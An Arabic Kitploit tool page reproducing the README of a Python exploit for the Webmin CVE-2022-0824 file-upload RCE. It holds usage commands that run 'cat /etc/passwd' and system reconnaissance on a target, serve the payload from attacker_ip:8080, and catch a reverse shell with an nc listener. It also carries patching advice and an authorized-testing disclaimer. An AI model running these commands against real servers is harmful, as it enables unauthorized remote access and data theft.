Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Webmin-CVE-2022-0824-Enhanced-Exploit — استغلال Python لثغرة Webmin CVE-2022-0824 مع دعم الوضع المزدوج: تنفيذ الأوامر مباشرة وصدفة عكسية. يوفر أنواعاً متعددة من الحمولات، وإدارة ذكية للملفات، وتسجيلاً تفصيلياً لتصحيح الأخطاء لاختبارات الأمان المصرح بها. | Kitploit
أدوات/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتوليد شيفرة القشرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

استغلال Python لثغرة Webmin CVE-2022-0824 مع دعم الوضع المزدوج: تنفيذ الأوامر مباشرة وصدفة عكسية. يوفر أنواعاً متعددة من الحمولات، وإدارة ذكية للملفات، وتسجيلاً تفصيلياً لتصحيح الأخطاء لاختبارات الأمان المصرح بها.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

أداة استغلال محسّنة لثغرة Webmin CVE-2022-0824 - تدعم وضعي تنفيذ الأوامر والـ Reverse Shell

Python Version License CVE

[!IMPORTANT]

أداة استغلال محسّنة لثغرة Webmin CVE-2022-0824، تدعم وضعي تنفيذ الأوامر المباشر والـ Reverse Shell.

🚀 الميزات

  • ✅ دعم الوضع المزدوج: وضع تنفيذ الأوامر + وضع الـ Reverse Shell
  • ✅ حمولات متعددة: ثلاثة أنواع مختلفة من الـ Payload: Perl وBash وPython
  • ✅ إدارة ذكية للملفات: توليد أسماء ملفات فريدة تلقائيًا لتجنب التعارض
  • ✅ رفع مع الكتابة القسرية: معالجة تلقائية لمشكلة استبدال الملفات الموجودة
  • ✅ طرق رفع متعددة: تنزيل HTTP، رفع مباشر، إنشاء عبر تنفيذ الأوامر
  • ✅ معلومات تصحيح مفصلة: سجلات كاملة لعملية التنفيذ
  • ✅ واجهة سهلة الاستخدام: مخرجات ملونة ومؤشرات حالة واضحة

📋 معلومات الثغرة

  • معرف CVE: CVE-2022-0824
  • الإصدارات المتأثرة: Webmin < 1.990
  • نوع الثغرة: تنفيذ تعليمات برمجية عن بُعد بسبب رفع ملفات عشوائي
  • تقييم CVSS: 9.8 (حرج)

🛠️ متطلبات التثبيت

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 طريقة الاستخدام

وضع تنفيذ الأوامر (موصى به)

root@kitploit:~
# تنفيذ أمر أساسي
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# عرض معلومات النظام
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# سرد الملفات
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# عرض ملف حساس
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# معلومات الشبكة
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

وضع Reverse Shell

root@kitploit:~
# 1. تشغيل المستمع
nc -nlvp 9999

# 2. تنفيذ الاستغلال
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 شرح المعاملات

*ملاحظة: مطلوب في وضع Reverse Shell

🎯 أمثلة الاستخدام

مثال 1: جمع معلومات النظام

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

مثال 2: استكشاف نظام الملفات

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

مثال 3: عرض إعدادات الشبكة

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 آلية العمل

  1. التحقق من تسجيل الدخول: تسجيل الدخول إلى واجهة إدارة Webmin باستخدام البيانات المقدمة
  2. توليد الـ Payload: إنشاء سكريبت CGI المناسب حسب الوضع
  3. رفع الملف: رفع الحمولة عبر ميزة تنزيل HTTP في مدير الملفات
  4. ضبط الصلاحيات: تعيين صلاحية التنفيذ للملف المرفوع
  5. تنفيذ الأوامر: الوصول إلى سكريبت CGI المرفوع لتنفيذ الأوامر أو إنشاء اتصال عكسي

🛡️ توصيات الحماية

  • قم بتحديث Webmin إلى أحدث إصدار (>= 1.990)
  • قيّد الوصول الشبكي إلى واجهة إدارة Webmin
  • استخدم كلمات مرور قوية والمصادقة الثنائية
  • دقق سجلات النظام بانتظام
  • انشر جدار حماية لتطبيقات الويب (WAF)

⚠️ إخلاء المسؤولية

هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها والأغراض التعليمية.

  • 🚫 يُحظر استخدامها على أنظمة غير مصرح بها
  • 🚫 يُحظر استخدامها في الهجمات الخبيثة
  • 🚫 يتحمل المستخدم المسؤولية القانونية المقابلة
  • ✅ استخدمها فقط في بيئات حصلت على إذن صريح
  • ✅ استخدمها في أبحاث الأمان والتحقق من الثغرات

📚 التفاصيل التقنية

أنواع الـ Payload

  • Perl CGI: الحمولة الرئيسية، الأفضل توافقًا
  • Bash CGI: حمولة احتياطية، مناسبة لأنظمة Linux
  • Python CGI: حمولة احتياطية، الأكثر ثراءً بالميزات

طرق الرفع

  1. تنزيل HTTP: عبر ميزة التنزيل عن بُعد في مدير ملفات Webmin
  2. رفع مباشر: عبر واجهة رفع الملفات
  3. إنشاء عبر الأوامر: إنشاء الملفات عبر أوامر النظام

استراتيجية تسمية الملفات

  • تجزئة MD5 لمحتوى الأمر
  • لاحقة الطابع الزمني
  • ضمان استخدام اسم ملف مختلف في كل تنفيذ

🔄 سجل التحديثات

v5.0 (2025-08-05)

  • ✨ إضافة وضع تنفيذ الأوامر
  • 🐛 إصلاح مشكلة الكتابة فوق الملفات
  • 🔧 تحسين استراتيجية تسمية الملفات
  • 📈 تعزيز معالجة الأخطاء

v4.0 (بناءً على النسخة الأصلية)

  • 🎯 استنادًا إلى الكود الأصلي لـ faisalfs10x
  • 🔧 تحسين توافق CGI
  • 📝 إضافة سجلات مفصلة

🤝 المساهمة

نرحب بتقديم المشكلات (Issues) وطلبات السحب (Pull Requests)!

  1. انسخ (Fork) هذا المشروع
  2. أنشئ فرع ميزة (git checkout -b feature/AmazingFeature)
  3. احفظ التغييرات (git commit -m 'Add some AmazingFeature')
  4. ادفع إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح طلب سحب (Pull Request)

📄 الرخصة

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل

🙏 الشكر والتقدير

  • مؤلف الكود الأصلي: @faisalfs10x
  • عنوان المشروع الأصلي: Webmin-CVE-2022-0824-revshell
  • مكتشف CVE: الباحثون الأمنيون المعنيون

📞 التواصل

إذا كانت لديك أسئلة أو اقتراحات، يرجى التواصل عبر:

  • 📧 تقديم Issue على GitHub
  • 🐛 للإبلاغ عن مشكلات أمنية يرجى إرسال رسالة خاصة

⭐ إذا كان هذا المشروع مفيدًا لك، يرجى دعمه بنجمة (Star)!

🔗 روابط ذات صلة

  • تفاصيل CVE-2022-0824
  • الموقع الرسمي لـ Webmin
  • المشروع الأصلي

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
تنزيل الأداة
المعاملالوصفمطلوبمثال
-t, --targetعنوان URL الخاص بـ Webmin المستهدف✅http://192.168.1.100:10000/
-c, --credentialبيانات تسجيل الدخول✅admin:password
-LS, --py3http_serverعنوان خادم HTTP✅192.168.1.50:8080
--shellالأمر المراد تنفيذه❌"ls -la"
-L, --callback_ipعنوان IP للاتصال الراجع في Reverse Shell❌*192.168.1.50
-P, --callback_portمنفذ الاتصال الراجع في Reverse Shell❌*9999